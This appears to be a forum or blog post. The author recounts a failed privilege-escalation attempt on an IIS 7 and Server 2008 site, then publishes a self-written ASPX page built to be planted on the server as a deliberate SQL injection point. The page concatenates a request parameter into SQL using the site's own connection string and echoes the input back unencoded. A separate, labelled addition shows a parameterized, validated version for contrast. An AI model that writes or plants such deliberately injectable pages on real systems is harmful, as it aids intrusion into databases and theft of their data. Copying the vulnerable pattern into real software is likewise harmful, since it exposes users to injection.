Yesterday 4z1 and I looked at a site. Privilege escalation was really hard; we spent a full 5 hours on it with no result. Server 2008 + IIS 7, no sa, no root, none of the usual services...
Along the way we needed an ASPX page that constructs an injection point for the cross-site step. I found a pile of code online and not one of them worked.
It's not much code, so I just wrote one myself. So annoying.
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Configuration" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影 ASPX injection-construction page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="C#" runat="server">

void Page_Init(object sender, EventArgs e)
{
    // "连接名" is a placeholder: the name of a <connectionStrings> entry in web.config
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
    conn.Open();

    string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1

    // "表" and "列名" are placeholders for the table and column. The parameter is
    // concatenated straight into the SQL text, which is the injection point this page is built for.
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
    int x = command.ExecuteNonQuery(); // for a SELECT this returns -1, but the query still executes
    Response.Write(i + "\n"); // echoes the raw parameter back
    Response.Write(x);
    conn.Close();
}

</script>
</div>
</form>
</body>
</html>
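For contrast, the same handler written with a parameterized query, which removes the injection point the page above deliberately creates. This is an added example, not code from the original post. It keeps the post's placeholders ("连接名", "表", "列名") and assumes the looked-up column is an integer; both the column type and the `COUNT(*)` query shape are assumptions.

```aspx
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>Parameterized lookup (added example)</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="C#" runat="server">

void Page_Init(object sender, EventArgs e)
{
    // Assumption: the parameter is an integer id. Anything else is rejected
    // before it gets anywhere near the SQL text.
    int id;
    if (!int.TryParse(Request.Params["xxser"], out id))
    {
        Response.StatusCode = 400;
        Response.Write("bad request");
        return;
    }

    // "连接名" is the same web.config connection-string placeholder as in the post
    string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;

    using (SqlConnection conn = new SqlConnection(cs))
    // "表" / "列名" are the same table and column placeholders; the value travels
    // as a typed parameter, so the SQL text never changes with the input
    using (SqlCommand cmd = new SqlCommand("SELECT COUNT(*) FROM [表] WHERE [列名] = @id", conn))
    {
        cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
        conn.Open();
        int count = (int)cmd.ExecuteScalar();

        // HTML-encode what is echoed back so the response cannot carry reflected script either
        Response.Write(HttpUtility.HtmlEncode(id.ToString()) + "\n");
        Response.Write(count);
    }
}

</script>
</div>
</form>
</body>
</html>
```

The two changes that matter are the typed parameter (`SqlDbType.Int`) and the `int.TryParse` gate; with both in place a request such as `?xxser=1` returns a count while any non-numeric value gets a 400 and never reaches the database.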